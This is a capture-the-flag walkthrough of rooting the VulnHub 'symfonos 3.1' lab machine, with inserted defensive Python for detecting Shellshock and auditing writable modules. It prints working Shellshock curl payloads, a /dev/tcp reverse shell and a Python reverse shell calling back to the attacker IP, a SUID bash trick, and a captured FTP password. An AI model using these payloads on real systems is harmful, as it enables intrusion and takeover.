[攻略鴨] symfonos 3.1 VulnHub target machine walkthrough

The content of this post is purely fictional. 攻略鴨 would appreciate a follow and a like on Bilibili!
Target machine IP: 192.168.31.37
Test (attacker) machine IP: 192.168.31.38
External information gathering
Visit http://192.168.31.37/
The page source contains a comment:
<!-- Can you bust the underworld? -->
Port scan
PORT   STATE SERVICE REASON         VERSION
21/tcp open  ftp     syn-ack ttl 64 ProFTPD 1.3.5b
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))
Web directory enumeration
$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.37/FUZZ
http://192.168.31.37/gate/
訪問后發(fā)現(xiàn)還只是個(gè)圖片
$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.37/gate/FUZZ
http://192.168.31.37/gate/cerberus/
訪問后發(fā)現(xiàn)還只是個(gè)圖片
$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.37/gate/cerberus/FUZZ
沒結(jié)果
換個(gè)字典
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://192.168.31.37/FUZZ
.hta                    [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 3ms]
cgi-bin/                [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 1ms]
.htpasswd               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 87ms]
gate                    [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 0ms]
index.html              [Status: 200, Size: 241, Words: 24, Lines: 23, Duration: 1ms]
.htaccess               [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 174ms]
server-status           [Status: 403, Size: 278, Words: 20, Lines: 10, Duration: 0ms]
The /cgi-bin/ entry indicates that CGI applications may be present on the machine.
$ ffuf -w /usr/share/wordlists/dirb/common.txt -u http://192.168.31.37/cgi-bin/FUZZ
沒結(jié)果
$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.37/cgi-bin/FUZZ
underworld              [Status: 200, Size: 62, Words: 14, Lines: 2, Duration: 149ms]
Visit http://192.168.31.37/cgi-bin/underworld
It returns: 21:20:03 up  1:55,  0 users,  load average: 0.22, 1.08, 0.72 (the output of uptime, which suggests a bash CGI script)
Shellshock vulnerability
curl -H "Connection: () { : ;};echo;echo;/bin/bash -c 'cat /etc/passwd'" http://192.168.31.37/cgi-bin/underworld
root:x:0:0:root:/root:/bin/bash
...
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
hades:x:1000:1000:,,,:/home/hades:/bin/bash
cerberus:x:1001:1001:,,,:/home/cerberus:/bin/bash
proftpd:x:108:65534::/run/proftpd:/bin/false
ftp:x:109:65534::/srv/ftp:/bin/false
nc -nvlp 443
curl -H "Connection: () { : ;};echo;echo;/bin/bash -i &>/dev/tcp/192.168.31.38/443 <&1" http://192.168.31.37/cgi-bin/underworld
cerberus@symfonos3:/usr/lib/cgi-bin$ id
uid=1001(cerberus) gid=1001(cerberus) groups=1001(cerberus),33(www-data),1003(pcap)
python -c 'import pty;pty.spawn("/bin/bash")'
$ searchsploit -m 36742.txt
Failed.
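As an added detection example (not code from the walkthrough), the following Python flags Shellshock-style function definitions in logged request headers. The one-header-per-line log format and the sample records are constructed assumptions; the second record reuses the request shown above.

```python
import re

# Shellshock payloads begin a header value with a bash function definition,
# "() {", close it with "};" and append the command to run.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Constructed record format (assumption: a reverse proxy or WAF that logs one
# header per line): "<client-ip> <method> <path> <Header-Name>: <value>".
RECORD_RE = re.compile(
    r"^(?P<ip>\S+) (?P<method>\S+) (?P<path>\S+) (?P<header>[^:]+): (?P<value>.*)$")

# Constructed sample log; the second record is the request from the walkthrough.
SAMPLE_RECORDS = [
    "192.168.31.38 GET /cgi-bin/underworld User-Agent: curl/7.88.1",
    "192.168.31.38 GET /cgi-bin/underworld Connection: () { : ;};echo;echo;/bin/bash -c 'cat /etc/passwd'",
    "192.168.31.38 GET /index.html Connection: keep-alive",
    "192.168.31.38 GET /cgi-bin/underworld Referer: () { :;}; /usr/bin/id",
]

def find_shellshock(records):
    """Return one finding per record whose header value carries a Shellshock
    function definition. Requests to CGI paths are rated high, because Apache
    passes request headers to CGI scripts as environment variables, which is
    exactly what the bug needs to trigger."""
    findings = []
    for line in records:
        m = RECORD_RE.match(line)
        if not m or not SHELLSHOCK_RE.search(m.group("value")):
            continue
        is_cgi = m.group("path").startswith("/cgi-bin/")
        findings.append({
            "ip": m.group("ip"),
            "path": m.group("path"),
            "header": m.group("header"),
            "severity": "high" if is_cgi else "medium",
        })
    return findings

if __name__ == "__main__":
    for f in find_shellshock(SAMPLE_RECORDS):
        print("%(severity)s: %(ip)s -> %(path)s via %(header)s header" % f)
```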
權(quán)限提升
pspy觀察系統(tǒng)進(jìn)程
用pspy觀察系統(tǒng)進(jìn)程看有沒有暫時(shí)看不到的定時(shí)任務(wù)/usr/sbin
cerberus@symfonos3:/tmp$ wget "http://192.168.31.38:8000/pspy64s"
cerberus@symfonos3:/tmp$ chmod +x pspy64s
cerberus@symfonos3:/tmp$ ./pspy64s
2023/02/07 01:55:40 CMD: UID=1000  PID=476    | proftpd: (accepting connections)
2023/02/07 01:56:01 CMD: UID=0     PID=20391  | /bin/sh -c /usr/bin/python2.7 /opt/ftpclient/ftpclient.py
2023/02/07 01:56:01 CMD: UID=0     PID=20390  | /bin/sh -c /usr/bin/curl --silent -I 127.0.0.1 > /opt/ftpclient/statuscheck.txt
2023/02/07 01:56:01 CMD: UID=1000  PID=20392  | proftpd: (accepting connections)
2023/02/07 01:56:01 CMD: UID=0     PID=20393  | /usr/sbin/CRON -f
2023/02/07 01:56:01 CMD: UID=105   PID=20394  | /usr/sbin/sendmail -i -FCronDaemon -B8BITMIME -oem root
2023/02/07 01:56:01 CMD: UID=1000  PID=20395  | /usr/sbin/exim4 -Mc 1pPIpd-0005Iv-CG
1. Capture the password from cleartext FTP traffic
cerberus@symfonos3:/usr/sbin$ ip add
1: lo: inet 127.0.0.1/8 scope host lo
2: ens33: inet 192.168.31.37/24 brd 192.168.31.255 scope global ens33
cerberus@symfonos3:/usr/lib/cgi-bin$ id
uid=1001(cerberus) gid=1001(cerberus) groups=1001(cerberus),33(www-data),1003(pcap)
屬于pcap組
tcpdump -i lo port 21
tcpdump: lo: You don't have permission to capture on that device
(socket: Operation not permitted)
遇到權(quán)限問題,把靶機(jī)刪掉重新創(chuàng)建。
tcpdump -i lo port 21
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
02:20:01.478756 IP localhost.59512 > localhost.ftp: Flags [P.], seq 1:13, ack 56, win 342, options [nop,nop,TS val 4294944980 ecr 4294944980], length 12: FTP: USER hades
02:20:01.478758 IP localhost.ftp > localhost.59512: Flags [.], ack 13, win 342, options [nop,nop,TS val 4294944980 ecr 4294944980], length 0
02:20:01.479803 IP localhost.ftp > localhost.59512: Flags [P.], seq 56:89, ack 13, win 342, options [nop,nop,TS val 4294944981 ecr 4294944980], length 33: FTP: 331 Password required for hades
02:20:01.479846 IP localhost.59512 > localhost.ftp: Flags [P.], seq 13:36, ack 89, win 342, options [nop,nop,TS val 4294944981 ecr 4294944981], length 23: FTP: PASS PTpZTfU4vxgzvRBE
02:20:01.489005 IP localhost.ftp > localhost.59512: Flags [P.], seq 89:115, ack 36, win 342, options [nop,nop,TS val 4294944983 ecr 4294944981], length 26: FTP: 230 User hades logged in
02:20:01.489102 IP localhost.59512 > localhost.ftp: Flags [P.], seq 36:51, ack 115, win 342, options [nop,nop,TS val 4294944983 ecr 4294944983], length 15: FTP: CWD /srv/ftp/
02:20:01.489378 IP localhost.ftp > localhost.59512: Flags [P.], seq 115:143, ack 51, win 342, options [nop,nop,TS val 4294944983 ecr 4294944983], length 28: FTP: 250 CWD command successful
USER hades
PASS PTpZTfU4vxgzvRBE
Use this username and password to test the SSH service.
ssh hades@192.168.31.37
hades@symfonos3:/tmp$ id
uid=1000(hades) gid=1000(hades) groups=1000(hades),1002(gods)
觀察系統(tǒng)進(jìn)程時(shí)看到系統(tǒng)定期執(zhí)行:/bin/sh -c /usr/bin/python2.7 /opt/ftpclient/ftpclient.py
$ cat /opt/ftpclient/ftpclient.py
cat: /opt/ftpclient/ftpclient.py: Permission denied
$ ls -al /opt/ftpclient
-rw-r--r-- 1 root hades  262 Apr  6  2020 ftpclient.py
-rw-r--r-- 1 root hades  251 Feb  7 02:55 statuscheck.txt
hades@symfonos3:/opt/ftpclient$ cat ftpclient.py
import ftplib
ftp = ftplib.FTP('127.0.0.1')
ftp.login(user='hades', passwd='PTpZTfU4vxgzvRBE')
ftp.cwd('/srv/ftp/')
def upload():
    filename = '/opt/client/statuscheck.txt'
    ftp.storbinary('STOR '+filename, open(filename, 'rb'))
    ftp.quit()
upload()
Privilege escalation by modifying a Python module
$ find / -name 'ftplib*' 2>/dev/null
/usr/lib/python2.7/ftplib.pyc
/usr/lib/python2.7/ftplib.py
/usr/lib/python3.5/__pycache__/ftplib.cpython-35.pyc
/usr/lib/python3.5/ftplib.py
$ ls -l /usr/lib/python2.7/ftplib.py
-rwxrw-r-- 1 root gods 37755 Sep 26  2018 /usr/lib/python2.7/ftplib.py
hades is in the gods group, which has write permission on this Python module.
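As an added defensive check (a hypothetical helper, not code from the walkthrough), this Python audits an import path for modules or directories writable by anyone other than root, the misconfiguration that turned ftplib.py into a root code path here. The sample fixture is constructed in a temporary directory.

```python
import os
import stat
import tempfile

# Hypothetical audit helper, not part of the walkthrough: find entries on a
# Python import path that an untrusted user can modify, the condition that
# made /usr/lib/python2.7/ftplib.py (root:gods, 0664) a root path via cron.

def mode_findings(st_mode, st_uid, st_gid, trusted_uids=(0,), trusted_gids=(0,)):
    """Reasons an entry with these stat values is modifiable by an untrusted user."""
    reasons = []
    if st_uid not in trusted_uids:
        reasons.append("owned by untrusted uid %d" % st_uid)
    if st_mode & stat.S_IWGRP and st_gid not in trusted_gids:
        reasons.append("group-writable by gid %d" % st_gid)
    if st_mode & stat.S_IWOTH:
        reasons.append("world-writable")
    return reasons

def audit_module_dirs(dirs, trusted_uids=(0,), trusted_gids=(0,)):
    """Walk each dir; a writable directory counts too (a module can be dropped in)."""
    hits = []
    for top in dirs:
        if not os.path.isdir(top):
            continue
        for root, subdirs, files in os.walk(top):
            for name in subdirs + files:
                path = os.path.join(root, name)
                if os.path.islink(path):
                    continue
                st = os.lstat(path)
                reasons = mode_findings(st.st_mode, st.st_uid, st.st_gid,
                                        trusted_uids, trusted_gids)
                if reasons:
                    hits.append({"path": path, "reasons": reasons})
    return sorted(hits, key=lambda h: h["path"])

def audit_demo():
    """Constructed fixture: a 0664 module like the one on the box, a safe 0644
    module and a world-writable one. Returns the basenames that get flagged."""
    base = tempfile.mkdtemp()
    for name, mode in (("ftplib.py", 0o664), ("safe.py", 0o644), ("world.py", 0o666)):
        path = os.path.join(base, name)
        open(path, "w").close()
        os.chmod(path, mode)
    # The fixture is owned by whoever runs this, so trust that uid but no group.
    hits = audit_module_dirs([base], trusted_uids=(os.getuid(),), trusted_gids=())
    return [os.path.basename(h["path"]) for h in hits]
```

On a real host, run audit_module_dirs as root over the search path of the interpreter the cron job actually uses (for example the output of python2.7 -c 'import sys; print(sys.path)'), since that is the path a privileged import resolves against.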
1.創(chuàng)建新ftplib.py去復(fù)制/bin/bash并覆蓋原有的ftplib.py
備份ftplib.py
cp /usr/lib/python2.7/ftplib.py /tmp/ftplib.py.bak
創(chuàng)建一個(gè)新的ftplib.py
nano /tmp/ftplib.py
import os;os.system("cp /bin/bash /tmp/rootbash;chmod u+s /tmp/rootbash")
Overwrite the original ftplib.py
cp /tmp/ftplib.py /usr/lib/python2.7/ftplib.py
等一會(huì)兒將獲得bash
ls -l /tmp/rootbash
/tmp/rootbash
2. Add a Python reverse shell to ftplib.py
$ vi /usr/lib/python2.7/ftplib.py
Add:
import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.38",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Start a listener on the test machine:
$ nc -nvlp 9000
# id
uid=0(root) gid=0(root) groups=0(root)
Other
Flag
# cat /root/proof.txt
Congrats on rooting symfonos:3!